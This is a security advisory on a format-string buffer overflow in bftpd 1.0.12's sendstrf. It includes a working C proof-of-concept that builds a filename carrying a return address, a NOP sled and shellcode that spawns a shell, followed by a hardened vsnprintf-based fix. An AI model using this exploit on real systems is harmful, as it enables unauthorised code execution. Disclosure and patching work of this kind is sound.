There is a malformed vsprintf in bftpd 1.0.12 in function sendstrf:

    int sendstrf(int s, char *format, ...)
    {
        ....
        vsprintf(buffer, format, val);

when the function is called from the NLIST command:

        else foo = 1;
        sendstrf(s, entry->d_name);
    }

This can be used to overflow the buffer of the vsprintf and execute arbitrary code. I don't think it can normally be used for a remote attack, because bftpd removes all non-printable characters from input strings, so it is not possible to remotely put shellcode in a filename. Demonstration code is attached.

asynchro@pkcrew.org
www.pkcrew.org

    /*
     * Creates a filename to exploit the bug in bftpd 1.0.12.
     * Create the file, cwd in the shell directory and NLIST the file
     * directory (sh is executed in the working dir because it is not
     * possible to insert a / in the filename).
     *
     * hints by |CyRaX| & Cthulhu
     * coded by asynchro
     * www.pkcrew.org
     */

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    #define BUFSIZE 512
    #define NOP     124

    int main(void)
    {
        int i;
        char *buff;
        char nop = 0x90;
        char addr[] = "\xd4\xf9\xff\xbf";      /* return address overwriting the saved eip */
        char command[] = "touch %.260x";       /* width directive pads the vsprintf output */
        char shellcode[] =
            "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
            "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
            "\x80\xe8\xdc\xff\xff\xffsh";

        /* build the "touch <filename>" command line */
        buff = (char *) malloc(BUFSIZE);
        memset(buff, 0x0, BUFSIZE);
        memcpy(buff, command, sizeof(command));
        strncat(buff, addr, 4);
        strncat(buff, addr, 4);
        for (i = 0; i < NOP; i++) {
            strncat(buff, &nop, 1);
        }
        strncat(buff, shellcode, strlen(shellcode));
        system(buff);
        return 0;
    }
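For comparison, here is a hardened counterpart to the sendstrf pattern described above. This is an added example, not bftpd's code: it writes into a caller-supplied buffer instead of a socket, the SENDBUF size and the function names are assumptions, and it closes both defects at once by using a constant "%s" format for the entry name and vsnprintf in place of the unbounded vsprintf.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

#define SENDBUF 512 /* assumed line-buffer size for this demo, not bftpd's */

/* Format into out with vsnprintf; return bytes written, or -1 when the
 * result would not fit, so the caller drops the line instead of sending
 * a truncated one. This replaces the unbounded vsprintf. */
int sendstrf_safe(char *out, size_t outlen, const char *format, ...)
{
    va_list val;
    int n;
    va_start(val, format);
    n = vsnprintf(out, outlen, format, val);
    va_end(val);
    if (n < 0 || (size_t)n >= outlen) {
        out[0] = '\0';
        return -1;
    }
    return n;
}

/* NLIST path: the entry name is data, so it travels as the argument of a
 * constant "%s" format instead of being used as the format itself. */
int send_entry_name(char *out, size_t outlen, const char *d_name)
{
    return sendstrf_safe(out, outlen, "%s\r\n", d_name);
}

/* Audit helper: count '%' characters in an entry name. Harmless to the
 * fixed code, but a name like "touch %.260x" is worth flagging in logs. */
int count_format_chars(const char *d_name)
{
    int c = 0;
    for (; *d_name; d_name++)
        if (*d_name == '%')
            c++;
    return c;
}

int main(void)
{
    char line[SENDBUF];
    const char *names[] = { "README", "touch %.260x", "%n%n%n%n" }; /* constructed */
    for (size_t i = 0; i < 3; i++) {
        int n = send_entry_name(line, sizeof line, names[i]);
        printf("%-14s -> %d bytes, %d '%%': %s", names[i], n,
               count_format_chars(names[i]), n < 0 ? "(dropped)\n" : line);
    }
    return 0;
}
```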